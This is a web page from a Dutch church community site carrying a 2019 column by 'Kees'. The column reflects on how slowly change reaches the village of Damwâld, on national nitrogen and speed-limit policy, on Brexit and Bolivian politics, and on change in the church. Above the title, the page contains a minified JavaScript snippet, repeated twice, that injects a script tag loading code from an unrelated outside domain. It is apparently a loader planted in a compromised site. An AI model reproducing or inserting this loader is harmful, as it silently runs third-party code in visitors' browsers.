;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Veranderingen ... - PKN Damwâld

Veranderingen …

Gepubliceerd op: donderdag 14 november 2019

Als er iets in de wereld gebeurt, dan merk je dat pas jaren later in ons dorp. Dat vertelden ze mij toen ik in Damwâld kwam te wonen en deel ging uitmaken van de kerkgemeenschap. “Hier gebeurt alles altijd 20 jaar later”, zo was de sterkste formulering. Het werd inmiddels meer dan 20 jaar geleden zogezegd. De opmerking viel in een gesprek waarin wel wat ergernis te bespeuren was. Het ging over de gewoonten die er waren en dat moderniseringen meestal eerst plaatsvinden in het westen van het land.

Het is natuurlijk zo dat de samenleving ‘achter het IJsselmeer’ op een zekere manier nog altijd in een wat rustig vaarwater blijft. Deze maand is politiek spannend. In Amerika, in Engeland. Hoe zal het bijvoorbeeld verder gaan met de brexit? Of we in Damwâld van de uitkomst van al die ontwikkelingen veel zullen merken zal nog moeten blijken. In het westen van ons land hopen Amsterdam en Rotterdam op het ontvangen van bedrijven die aan deze kant van de grens een vestiging willen hebben. Het is iets van de randstad en dat is ver van hier.

Binnenkort mogen we overdag nog maar  maximaal 100 kilometer per uur rijden met onze auto en krijgen de koeien enzymen toegediend om het milieu maar minder te belasten. De natuur krijgt voorrang. Belangengroepen worden afgekocht met een Haagse zak met geld. Voor veel jongeren, maar het geldt ook voor veel ouderen, is dat iets wat ver van ze afstaat. Het leven in Damwâld is wel anders dan 20 jaar geleden, maar of deze ingrepen iets zullen uitmaken is de vraag. We mogen verwachten dat de stikstofuitstoot en -neerslagverlaging veranderingen zal brengen, maar of het het leven in Damwâld veel zal beïnvloeden? De tijd zal het leren.

Waar we zeker niets van zullen merken is wat de uitslag zal zijn van mogelijk nieuwe verkiezingen in Bolivia, waar president Morales zondag aftrad na wekenlange protesten tegen hem. Hij wordt beschuldigd van fraude, nadat hij in oktober de verkiezingsoverwinning claimde terwijl de stembussen vervroegd waren gesloten. Morales was veertien jaar lang aan de macht in Bolivia. Als de politiek in dit instabiele land bij de beslissing blijft, zijn daar binnenkort weer  verkiezingen. Hoe zal het daar gaan? Dit soort nieuws haalt bij ons alleen de krant als er vreselijke dingen gebeuren. Zelfs dan verandert het leven bij ons in geen enkel opzicht.

De gewoonten waar 20 jaar geleden in de wandelgangen over werd gemopperd gingen over de kerk. Het was altijd hetzelfde! Nooit kon er iets nieuws! Het geloof verandert toch mensen? Het leek er niet op. Alles moest van de oudere generatie hetzelfde blijven. Inmiddels kijken we er zo ongeveer een mensenleven op terug en zien dat er heel veel is veranderd. Soms gaat het gewoon niet zo snel. Maar het verandert wel en wij veranderen mee. De kerk verandert mee met de wereld waarin we kerk zijn. Daarom is het goed om niet alleen te denken over wat er anders moet, maar ook wat van waarde is om vast te houden!

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns